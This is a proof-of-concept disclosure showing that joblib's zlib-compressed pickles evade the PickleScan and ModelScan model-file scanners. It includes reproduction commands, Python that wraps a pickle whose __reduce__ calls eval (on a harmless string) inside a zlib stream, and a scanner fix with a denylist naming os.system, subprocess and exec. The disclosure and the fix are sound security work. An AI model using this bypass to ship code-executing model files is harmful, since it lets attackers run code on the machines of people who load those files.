
PoC: Joblib Compressed Pickle Bypasses ML Security Scanners

Format: Joblib (.joblib)
Target: PickleScan + ModelScan
CWE: CWE-502 (Deserialization of Untrusted Data)

Vulnerability

Joblib compressed pickles bypass both PickleScan and ModelScan. Both scanners walk the pickle opcode stream with pickletools.genops(), which expects a raw pickle. A joblib compressed file starts with the compression container (a zlib stream for joblib's default compress setting) rather than pickle opcodes, so genops() cannot parse it, nothing is flagged, and the file is reported clean. joblib.load() transparently decompresses the container and then unpickles its contents, so the embedded payload executes on load.

Reproduction

pip install picklescan modelscan
picklescan -p poc_joblib_bypass.joblib  # Reports: Infected files: 0
modelscan scan -p poc_joblib_bypass.joblib  # Reports: No issues found!
python3 -c "import joblib; joblib.load('poc_joblib_bypass.joblib')"  # Executes payload

Tested: PickleScan 1.0.3, ModelScan 0.8.7
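The following is an added, self-contained illustration of the mechanism described under Vulnerability and of the check a scanner needs to pass the Reproduction steps above. It is not the PoC file from this repo and does not use joblib itself: it builds a zlib stream around an ordinary pickle, which is assumed to match the container joblib.dump(..., compress=3) writes, and it reduces joblib.load() to the decompress-then-unpickle steps that matter here (assumption: no numpy array wrappers in the stream). The Payload class, the DANGEROUS denylist, and the CONTAINERS magic table are hypothetical names chosen for this example; the payload calls builtins.eval on a harmless string so the execution path is visible without side effects.

```python
import bz2
import gzip
import lzma
import pickle
import pickletools
import zlib


class Payload:
    """Hypothetical stand-in for whatever the PoC file embeds: __reduce__ makes
    the unpickler call builtins.eval on attacker-chosen text at load time."""

    def __reduce__(self):
        return (eval, ("'PAYLOAD-EXECUTED'",))


def make_joblib_style_pickle(obj=None, level=3) -> bytes:
    """Bytes shaped like joblib.dump(obj, path, compress=level) output:
    a standard zlib stream (0x78 prefix) wrapping a plain pickle.
    Assumption: joblib's default zlib container is a standard zlib stream;
    this example does not call joblib."""
    raw = pickle.dumps(Payload() if obj is None else obj, protocol=4)
    return zlib.compress(raw, level)


# Denylist of (module, name) pairs whose appearance as a pickle global
# means arbitrary code runs on load. Illustrative, not exhaustive.
DANGEROUS = {
    ("builtins", "eval"), ("builtins", "exec"),
    ("os", "system"), ("posix", "system"), ("nt", "system"),
    ("subprocess", "Popen"), ("subprocess", "run"),
}


def globals_in_pickle(data: bytes):
    """Every (module, name) the stream imports via GLOBAL or STACK_GLOBAL.
    STACK_GLOBAL takes module and name from the two preceding string ops."""
    found = []
    recent_strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            recent_strings.append(arg)
        elif op.name == "GLOBAL":
            module, name = arg.split(" ", 1)  # genops joins the two lines with a space
            found.append((module, name))
        elif op.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            found.append((recent_strings[-2], recent_strings[-1]))
    return found


def naive_scan(data: bytes) -> dict:
    """Feed file bytes straight to genops (the pattern the page attributes to
    PickleScan/ModelScan). A compressed file is not a pickle stream: genops
    raises on the first byte, nothing is flagged, the file looks clean."""
    try:
        hits = [g for g in globals_in_pickle(data) if g in DANGEROUS]
        return {"parsed": True, "flagged": hits}
    except ValueError:
        return {"parsed": False, "flagged": []}  # "Infected files: 0"


# Compression prefixes joblib recognises (assumed list) and how to unwrap them.
CONTAINERS = (
    (b"\x78", "zlib", zlib.decompress),
    (b"\x1f\x8b", "gzip", gzip.decompress),
    (b"BZh", "bz2", bz2.decompress),
    (b"\xfd7zXZ\x00", "xz", lzma.decompress),
)


def unwrap_container(data: bytes):
    """Sniff the container by magic bytes and decompress, so the scanner sees
    the same bytes joblib's unpickler will see."""
    for magic, name, decompress in CONTAINERS:
        if data.startswith(magic):
            return name, decompress(data)
    return None, data


def hardened_scan(data: bytes) -> dict:
    """Same opcode scan, but applied after unwrapping the container."""
    container, inner = unwrap_container(data)
    hits = [g for g in globals_in_pickle(inner) if g in DANGEROUS]
    return {"container": container, "flagged": hits}


def load_like_joblib(data: bytes):
    """joblib.load() reduced to the two steps that matter here: decompress,
    then unpickle. On the payload this runs builtins.eval."""
    _, inner = unwrap_container(data)
    return pickle.loads(inner)


if __name__ == "__main__":
    blob = make_joblib_style_pickle()
    print("naive   :", naive_scan(blob))      # parsed=False, nothing flagged
    print("hardened:", hardened_scan(blob))   # zlib container, builtins.eval flagged
    print("loaded  :", load_like_joblib(blob))  # the eval'd string
```

The fix on the scanner side is the unwrap_container step: scan what the loader will unpickle, not the bytes on disk. A scanner that treats "no parseable opcodes" as "clean" rather than as "unknown format, inspect further" will miss any container it does not sniff, so unparseable input should be reported as such, not silently counted as safe.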
